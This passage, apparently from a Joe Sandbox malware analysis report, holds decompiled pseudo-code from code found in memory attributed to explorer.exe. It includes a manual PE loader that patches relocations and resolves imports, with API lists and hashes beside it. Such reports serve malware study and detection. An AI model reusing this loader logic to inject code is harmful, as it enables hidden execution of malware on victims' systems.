										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E02F8F0DE(_t169);
										}
										E02F8584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x2f9f81c; // 0x2fb0000
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E02F8109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E02F88BAF( &_v596);
												 *_t187 = 0x2f9c9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x2f9c9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x2fb0228
									_t142 = _t40;
									L25:
									_t78 = E02F85AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x2f9f81c; // 0x2fb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E02F8D11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x2f9f818; // 0x508f6c8
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x2f9f818; // 0x508f6c8
								 *((intOrPtr*)(_t97 + 0x30))();
								E02F88BF4( &_v636, _t178);
                                                                                                                                                                                              								_t130 = _t96;
                                                                                                                                                                                              								goto L17;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E02F88BF4( &_v632, _t178);
                                                                                                                                                                                              							_t72 = 1;
                                                                                                                                                                                              							goto L42;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t104 =  *(_t65 + 0x1898);
                                                                                                                                                                                              						__eflags = _t104 & 0x00000004;
                                                                                                                                                                                              						if((_t104 & 0x00000004) == 0) {
                                                                                                                                                                                              							__eflags = _t104;
                                                                                                                                                                                              							if(_t104 != 0) {
                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							E02F8F1F6(_v600, _t161);
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E02F8F1B6(_v600,  &_v580);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0xfffffffe);
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t107 = E02F83097( &_v532, _t178, 0x105);
                                                                                                                                                                                              					_t190 = _t107;
                                                                                                                                                                                              					if(_t107 == 0) {
                                                                                                                                                                                              						L41:
                                                                                                                                                                                              						E02F85F6F( &_v588);
                                                                                                                                                                                              						_t72 = _t178;
                                                                                                                                                                                              						L42:
                                                                                                                                                                                              						return _t72;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























































                                                                                                                                                                                              0x02f853b3
                                                                                                                                                                                              0x02f852eb
                                                                                                                                                                                              0x02f852eb
                                                                                                                                                                                              0x02f852f1
                                                                                                                                                                                              0x02f852f3
                                                                                                                                                                                              0x02f852f8
                                                                                                                                                                                              0x02f852f8
                                                                                                                                                                                              0x02f852fa
                                                                                                                                                                                              0x02f85329
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85329
                                                                                                                                                                                              0x02f852fc
                                                                                                                                                                                              0x02f8518a
                                                                                                                                                                                              0x02f8518a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8518a
                                                                                                                                                                                              0x02f852db
                                                                                                                                                                                              0x02f851de
                                                                                                                                                                                              0x02f851ec
                                                                                                                                                                                              0x02f851ff
                                                                                                                                                                                              0x02f85204
                                                                                                                                                                                              0x02f8520a
                                                                                                                                                                                              0x02f8520c
                                                                                                                                                                                              0x02f85224
                                                                                                                                                                                              0x02f85229
                                                                                                                                                                                              0x02f85232
                                                                                                                                                                                              0x02f85238
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85238
                                                                                                                                                                                              0x02f85214
                                                                                                                                                                                              0x02f8521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8521d
                                                                                                                                                                                              0x02f851b1
                                                                                                                                                                                              0x02f851b7
                                                                                                                                                                                              0x02f851b9
                                                                                                                                                                                              0x02f851c6
                                                                                                                                                                                              0x02f851c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f851ca
                                                                                                                                                                                              0x02f851ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f851ce
                                                                                                                                                                                              0x02f851bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f851bf
                                                                                                                                                                                              0x02f85188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85113
                                                                                                                                                                                              0x02f8511e
                                                                                                                                                                                              0x02f85124
                                                                                                                                                                                              0x02f85126
                                                                                                                                                                                              0x02f853b5
                                                                                                                                                                                              0x02f853b9
                                                                                                                                                                                              0x02f853be
                                                                                                                                                                                              0x02f853c0
                                                                                                                                                                                              0x02f853c6
                                                                                                                                                                                              0x02f853c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: 99c7c694d9c6513ea18e3bdb14a4731e69e3d60759883c9e2bfc0b5a846aa7e4
                                                                                                                                                                                              • Instruction ID: 83e7076e19e088a9980a3a1c589e9f12e6759f17f830a5600a7915963e9a9781
                                                                                                                                                                                              • Opcode Fuzzy Hash: 99c7c694d9c6513ea18e3bdb14a4731e69e3d60759883c9e2bfc0b5a846aa7e4
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC81E171B043059FE714FB24DC84F7AF3E6EB84790F554A2EE6559B280EFB098058B82
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E02F8DE26(WCHAR* __ecx) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				WCHAR* _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				WCHAR* _v140;
                                                                                                                                                                                              				WCHAR* _v144;
                                                                                                                                                                                              				short _v664;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				signed int _t30;
                                                                                                                                                                                              				WCHAR* _t36;
                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                              				signed int _t41;
                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				WCHAR* _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				WCHAR* _t52;
                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                              				_t51 = 0;
                                                                                                                                                                                              				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                              				_t44 = _v8;
                                                                                                                                                                                              				_t41 = 0;
                                                                                                                                                                                              				_v12 = _t28;
                                                                                                                                                                                              				if(_t44 <= 0) {
                                                                                                                                                                                              					L22:
                                                                                                                                                                                              					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                              					__eflags = _t29;
                                                                                                                                                                                              					return _t29;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					L1:
                                                                                                                                                                                              					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                                              					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                                              					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                                              						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                                              						_t40 = lstrlenW(_t49);
                                                                                                                                                                                              						_t45 = 0;
                                                                                                                                                                                              						if(_t40 <= 0) {
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							_t44 = _v8;
                                                                                                                                                                                              							_t51 = _t51 + 1;
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							L8:
                                                                                                                                                                                              							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                                              								_t49[_t45] = 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                              						} while (_t45 < _t40);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t28 = _v12;
                                                                                                                                                                                              					_t41 = _t41 + 1;
                                                                                                                                                                                              				} while (_t41 < _t44);
                                                                                                                                                                                              				if(_t51 != 1) {
                                                                                                                                                                                              					if(__eflags <= 0) {
                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t52 = _v140;
                                                                                                                                                                                              					L17:
                                                                                                                                                                                              					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                                              						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_t52);
                                                                                                                                                                                              						_push(0x2f9c9a0);
                                                                                                                                                                                              						_t36 = E02F89A5A( &_v664);
                                                                                                                                                                                              						_v12 = _t36;
                                                                                                                                                                                              						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                                              						E02F88BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t52 = _v144;
                                                                                                                                                                                              				goto L17;
                                                                                                                                                                                              			}






















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 02F8DE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 02F8DE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 02F8DE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 02F8DEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 02F8DF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 02F8DF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: 895fc536e00e5ce9d2c4bdaf6fc729c406856620b63e41e726e8f62d755d501c
                                                                                                                                                                                              • Instruction ID: 0004592873c1c1130043ed5d24a3cadba759a02a0d50391e0d34dd3e5771670f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 895fc536e00e5ce9d2c4bdaf6fc729c406856620b63e41e726e8f62d755d501c
                                                                                                                                                                                              • Instruction Fuzzy Hash: B7310472D0011AEBDF38BB75C889AADF778EF153D4F104499E606E20D4E7B09980CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8E66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 02F8E672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8E686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8E701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8E704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8E709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: 572fca71e3fb3c313e1d9840c544c1127a93b6d81ca26157a6133f86c6507d25
                                                                                                                                                                                              • Instruction ID: 3e1f05901c51d134589774f14331be8856f3da45157eebe711aa7010301f375f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 572fca71e3fb3c313e1d9840c544c1127a93b6d81ca26157a6133f86c6507d25
                                                                                                                                                                                              • Instruction Fuzzy Hash: B221F975D00219BFDB00EFA9CC88DAEBBBDEF48694B104499F505A7250DB71AE01CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E02F93D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                                              				signed int _v5;
                                                                                                                                                                                              				signed short _v12;
                                                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				signed int* _v24;
                                                                                                                                                                                              				unsigned int _v28;
                                                                                                                                                                                              				signed short* _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				intOrPtr* _v48;
                                                                                                                                                                                              				signed short* _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				unsigned int _v60;
                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                              				_Unknown_base(*)()* _v68;
                                                                                                                                                                                              				signed int _v72;
                                                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                                                              				unsigned int _v88;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				signed int _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                                                              				intOrPtr _v112;
                                                                                                                                                                                              				CHAR* _v116;
                                                                                                                                                                                              				signed int _v120;
                                                                                                                                                                                              				intOrPtr _v124;
                                                                                                                                                                                              				signed int _v128;
                                                                                                                                                                                              				signed int _v132;
                                                                                                                                                                                              				signed int _t216;
                                                                                                                                                                                              				signed int _t233;
                                                                                                                                                                                              				void* _t273;
                                                                                                                                                                                              				signed int _t278;
                                                                                                                                                                                              				signed int _t280;
                                                                                                                                                                                              				intOrPtr _t320;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                              				_v20 = _v84;
                                                                                                                                                                                              				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                                              				_v64 = _t320;
                                                                                                                                                                                              				if(_t320 == 0) {
                                                                                                                                                                                              					L13:
                                                                                                                                                                                              					while(0 != 0) {
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(8);
                                                                                                                                                                                              					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                                              						L35:
                                                                                                                                                                                              						if(_a16 == 0) {
                                                                                                                                                                                              							L54:
                                                                                                                                                                                              							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_a12 != 0) {
                                                                                                                                                                                              								 *_a12 = _v80;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                                              							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_v124 != 0) {
                                                                                                                                                                                              								if(_v44 == 0) {
                                                                                                                                                                                              									L77:
                                                                                                                                                                                              									return 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(_a20 != 1) {
                                                                                                                                                                                              									if(_a20 != 2) {
                                                                                                                                                                                              										L75:
                                                                                                                                                                                              										while(0 != 0) {
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L77;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									while(0 != 0) {
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_v132 = _v44;
                                                                                                                                                                                              									goto L75;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								while(0 != 0) {
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v44();
                                                                                                                                                                                              								goto L75;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							return 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while(0 != 0) {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_push(8);
                                                                                                                                                                                              						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                                              							goto L54;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v128 = 0x80000000;
                                                                                                                                                                                              						_t216 = 8;
                                                                                                                                                                                              						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                                              						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                                              						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                                              						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                                              						while(0 != 0) {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v40 = _v40 & 0x00000000;
                                                                                                                                                                                              						while(_v40 < _v104) {
                                                                                                                                                                                              							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                                              							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                                              							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                                              								_v40 = _v40 + 1;
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v44 = _v120;
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v44 != 0) {
                                                                                                                                                                                              							goto L54;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while(0 != 0) {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return 0xffffffff;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v96 = 0x80000000;
                                                                                                                                                                                              					_t233 = 8;
                                                                                                                                                                                              					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                                              						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                              						if(_v36 == 0) {
                                                                                                                                                                                              							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                              							if( *_v16 == 0) {
                                                                                                                                                                                              								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v24 =  *_v16 + _a4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v72 = _v72 & 0x00000000;
                                                                                                                                                                                              							while( *_v24 != 0) {
                                                                                                                                                                                              								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                                              									_v100 =  *_v24 + _a4;
                                                                                                                                                                                              									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                                              									 *_v24 = _v68;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v24 =  &(_v24[1]);
                                                                                                                                                                                              								_v72 = _v72 + 4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v16 = _v16 + 0x14;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t273 = 0xfffffffd;
                                                                                                                                                                                              							return _t273;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L35;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t278 = 8;
                                                                                                                                                                                              				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                                              				_t280 = 8;
                                                                                                                                                                                              				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                                              				while(0 != 0) {
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(_v56 > 0) {
                                                                                                                                                                                              					_v28 = _v52[2];
                                                                                                                                                                                              					_v56 = _v56 - _v28;
                                                                                                                                                                                              					_v28 = _v28 - 8;
                                                                                                                                                                                              					_v28 = _v28 >> 1;
                                                                                                                                                                                              					_v32 =  &(_v52[4]);
                                                                                                                                                                                              					_v92 = _a4 +  *_v52;
                                                                                                                                                                                              					_v60 = _v28;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_v88 = _v60;
                                                                                                                                                                                              						_v60 = _v60 - 1;
                                                                                                                                                                                              						if(_v88 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                                              						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                                              						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                                              						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                                              							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                                              								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v32 =  &(_v32[1]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v52 = _v32;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L13;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x02f93e04
                                                                                                                                                                                              0x02f93e07
                                                                                                                                                                                              0x02f93e0a
                                                                                                                                                                                              0x02f93e11
                                                                                                                                                                                              0x02f93e18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93e23
                                                                                                                                                                                              0x02f93e31
                                                                                                                                                                                              0x02f93e3c
                                                                                                                                                                                              0x02f93e46
                                                                                                                                                                                              0x02f93e5e
                                                                                                                                                                                              0x02f93e6b
                                                                                                                                                                                              0x02f93e6b
                                                                                                                                                                                              0x02f93e48
                                                                                                                                                                                              0x02f93e53
                                                                                                                                                                                              0x02f93e53
                                                                                                                                                                                              0x02f93e72
                                                                                                                                                                                              0x02f93e72
                                                                                                                                                                                              0x02f93e7a
                                                                                                                                                                                              0x02f93e7a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 02F93ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 02F93EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 02F93F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 02F93F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 02F94052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: ce2764574469e47606b41e55e1bffa13ff6eef67eab22a368b1fad48f0ee7261
                                                                                                                                                                                              • Instruction ID: 99969266bb2d0fa19dc7d0a4c9b56081ece302c3271f8252b4295f7b4a490311
                                                                                                                                                                                              • Opcode Fuzzy Hash: ce2764574469e47606b41e55e1bffa13ff6eef67eab22a368b1fad48f0ee7261
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84E1B175E04209DFEF14CFA8C980AADBBB1FF08398F148559E915AB3A1D730A941CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 399081f37730c5f501b9ab750906c72c231d43401d41019892c07dbcbb91dab8
                                                                                                                                                                                              • Instruction ID: d9927c747cd7d5f8315449140385b38bbec4cdd2d3779230f505486c518e17bb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 399081f37730c5f501b9ab750906c72c231d43401d41019892c07dbcbb91dab8
                                                                                                                                                                                              • Instruction Fuzzy Hash: C941A132B0020797FF284E6C9D99BBF3A5AEF512D4F14003AFB1E96250E261CD95C6A5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E02F8E400(void* __ecx) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                              				intOrPtr* _t16;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				intOrPtr* _t23;
                                                                                                                                                                                              				intOrPtr* _t24;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                              				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                              				_t15 =  &_v12;
                                                                                                                                                                                              				__imp__CoCreateInstance(0x2f9c868, 0, 1, 0x2f9c878, _t15);
                                                                                                                                                                                              				if(_t15 < 0) {
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t23 = _v8;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t24 = _v12;
                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t24 + 8))(_t24);
